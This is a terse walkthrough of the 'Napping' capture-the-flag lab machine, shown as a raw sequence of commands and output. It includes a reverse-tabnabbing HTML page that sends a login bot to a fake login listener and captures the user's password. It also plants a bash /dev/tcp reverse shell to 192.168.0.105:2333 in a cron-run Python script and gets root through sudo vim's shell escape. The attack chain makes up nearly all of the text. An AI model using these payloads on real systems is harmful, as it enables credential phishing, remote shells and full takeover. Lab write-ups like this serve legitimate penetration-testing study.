Napping

$ sudo nmap -sP 192.168.0.1/24

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:25 CST
Nmap scan report for 192.168.0.1
Host is up (0.00040s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.012s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for 192.168.0.101
Host is up (0.014s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.00020s latency).
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.104
Host is up (0.014s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.109
Host is up (0.0016s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.105
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 1.93 seconds

$ sudo nmap -sV -sC -A 192.168.0.103

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 19:26 CST
Nmap scan report for 192.168.0.103
Host is up (0.00021s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
|   256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_  256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.0.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Joker</title>
</head>

<body>
    <script>
        if (window.opener) mainframe.location.replace = ('http://192.168.0.105:7777/login.html');
        if (window.opener != window) mainframe.location.replace = ('http://192.168.0.105:7777/login.html');
    </script>
</body>

</html>

$ nc -lvvp 7777

listening on [any] 7777 ...
192.168.0.103: inverse host lookup failed: Unknown host
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.103] 45716
POST /login.html HTTP/1.1
Host: 192.168.0.105:7777
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

username=daniel&password=C%40ughtm3napping123 sent 0, rcvd 274

$ ssh -p22 daniel@192.168.0.103 

daniel@napping:~$ id

uid=1001(daniel) gid=1001(daniel) groups=1001(daniel),1002(administrators)

daniel@napping:~$ groups

daniel administrators

daniel@napping:~$ find / -group administrators  -print 2>/dev/null

/home/adrian/query.py

daniel@napping:~$ cat /home/adrian/query.py

from datetime import datetime
import requests

now = datetime.now()

r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()

daniel@napping:~$ cat /home/adrian/site_status.txt 

Site is Up: 24/03/2022 15:20:01
Site is Up: 24/03/2022 15:22:02
Site is Up: 24/03/2022 15:24:01
Site is Up: 24/03/2022 15:26:01
Site is Up: 24/03/2022 15:28:01
Site is Up: 24/03/2022 15:30:01
Site is Up: 26/03/2022 11:26:11
Site is Up: 26/03/2022 11:28:01
Site is Up: 26/03/2022 11:30:01
Site is Up: 26/03/2022 11:32:01
Site is Up: 26/03/2022 11:34:01
Site is Up: 26/03/2022 11:36:02
Site is Up: 26/03/2022 11:38:01
Site is Up: 26/03/2022 11:40:01
Site is Up: 26/03/2022 11:42:01
Site is Up: 26/03/2022 11:44:01
Site is Up: 26/03/2022 11:46:02
Site is Up: 26/03/2022 11:48:01
Site is Up: 26/03/2022 11:50:01
Site is Up: 26/03/2022 11:52:01
Site is Up: 26/03/2022 11:54:01
Site is Up: 26/03/2022 11:56:02
Site is Up: 26/03/2022 11:58:01

daniel@napping:~$ vim /home/adrian/que

daniel@napping:~$ vim /home/adrian/query.py 

daniel@napping:~$ cd /home/adrian/

daniel@napping:/home/adrian$ ls

query.py  site_status.txt  user.txt

vim /dev/shm/shell.sh 

#! /bin/bash
sh -i >& /dev/tcp/192.168.0.105/2333 0>&1

daniel@napping:/tmp$ cd /home/adrian/

               
daniel@napping:/home/adrian$ vim query.py 

daniel@napping:/home/adrian$ cat query.py 

from datetime import datetime
import requests
import os
now = datetime.now()

os.system('/usr/bin/bash /dev/shm/shell.sh')
r = requests.get('http://127.0.0.1/')

if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()

nc -lvp 2333

listening on [any] 2333 ...
192.168.0.103: inverse host lookup failed: Unknown host
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.103] 37988
sh: 0: can't access tty; job control turned off
$ sudo -l 
Matching Defaults entries for adrian on napping:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on napping:
    (root) NOPASSWD: /usr/bin/vim
$ 

$ sudo /usr/bin/vim -c ':!/bin/sh'

Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'

:!/bin/sh
ls
query.py
site_status.txt
user.txt
whoami
root
cd /root	
ls
del_links.py
del_users.py
nap.py
root.txt
snap
cat root.txt
Admins just can't stay awake tsk tsk tsk